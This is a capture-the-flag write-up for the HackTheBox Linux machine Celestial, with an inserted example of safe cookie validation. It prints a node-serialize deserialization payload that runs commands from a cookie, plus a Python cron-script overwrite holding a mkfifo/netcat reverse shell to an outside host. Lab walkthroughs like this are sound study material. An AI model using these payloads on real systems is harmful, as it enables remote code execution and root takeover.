In this post we will resolve the machine Celestial from HackTheBox. It's an easy-rated Linux machine.

My nick on HackTheBox is manulqwerty. If you have any proposal or correction, do not hesitate to leave a comment.

Write-Up

Enumeration

As always, the first step is a port scan with Nmap:

nmap -sC -sV 10.10.10.85


There is an HTTP service on port 3000, so let's take a look at it:

Let’s intercept the request with BurpSuite:

As you can see, the Profile cookie appears to be Base64-encoded. Decoding it with the BurpSuite Decoder gives:

{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"2"}

If we change the value of the 'num' field to, for example, 4 and re-encode the cookie, the response is:

Hey Dummy 4 + 4 is 44

If instead we corrupt the cookie, the error response gives us some more information:

Exploitation

Let's look for vulnerabilities related to cookies in node.js:

https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
Following that guide, we can obtain RCE with this cookie value:

{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"_$$ND_FUNC$$_function (){\n \t require('child_process').exec('ping -c 10.10.14.16 /',function(error, stdout, stderr) { console.log(stdout) });\n }()"}
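The root cause above is that the application deserializes the cookie with node-serialize, which turns the _$$ND_FUNC$$_ marker into a function that is executed. As an added example (not code from the write-up or from the Celestial application), this is how the same Profile cookie can be handled safely: plain JSON.parse never yields functions, the marker is rejected outright, and 'num' is coerced to a number so that "4 + 4" no longer concatenates to "44". Field names are the ones seen in the decoded cookie; everything else is assumed.

```javascript
// Added example: safe handling of the Profile cookie (assumed API, not the app's own code).
const FUNC_MARKER = '_$$ND_FUNC$$_';
const ALLOWED_FIELDS = ['username', 'country', 'city', 'num'];

// Decode the base64 cookie into a validated profile object, or return null.
function parseProfileCookie(cookieValue) {
  let raw;
  try {
    raw = Buffer.from(cookieValue, 'base64').toString('utf8');
  } catch (e) {
    return null;
  }
  // The serialized-function marker never appears in a legitimate profile.
  if (raw.includes(FUNC_MARKER)) return null;

  let obj;
  try {
    obj = JSON.parse(raw); // plain JSON: data only, never code
  } catch (e) {
    return null;
  }
  if (obj === null || typeof obj !== 'object' || Array.isArray(obj)) return null;

  const profile = {};
  for (const key of Object.keys(obj)) {
    if (!ALLOWED_FIELDS.includes(key)) return null; // no unexpected fields
    if (typeof obj[key] !== 'string') return null;  // the app stores strings
    profile[key] = obj[key];
  }
  if (typeof profile.username !== 'string') return null;
  // 'num' must be a small non-negative integer; coerce it explicitly so the
  // greeting adds numbers instead of concatenating strings.
  if (!/^\d{1,3}$/.test(profile.num || '')) return null;
  profile.num = Number(profile.num);
  return profile;
}

// Build the greeting the app returns, using numeric addition.
function greet(profile) {
  const n = profile.num;
  return `Hey ${profile.username} ${n} + ${n} is ${n + n}`;
}

// Constructed inputs: the benign cookie from the page and an inert cookie carrying the marker.
const BENIGN = Buffer.from(
  '{"username":"Dummy","country":"Idk Probably Somewhere Dumb","city":"Lametown","num":"4"}'
).toString('base64');
const MALICIOUS = Buffer.from(
  '{"username":"Dummy","num":"_$$ND_FUNC$$_function (){ return 1 }()"}'
).toString('base64');
```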


And with the help of the Reverse Shell Cheat-Sheet we can easily obtain a reverse shell:

Post-Exploitation

As you can see, the user we obtained the shell as belongs to some interesting groups:

Taking advantage of being a member of the adm group, we can read the system logs:

cat /var/log/syslog


In this file we see that every 5 minutes the file /home/sun/Documents/script.py is run as root.
The next step is to edit that file so that it spawns a reverse shell:

#!/usr/bin/env python
import os
import sys
try:
	os.system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.9 7777 >/tmp/f')
except:
	sys.exit()
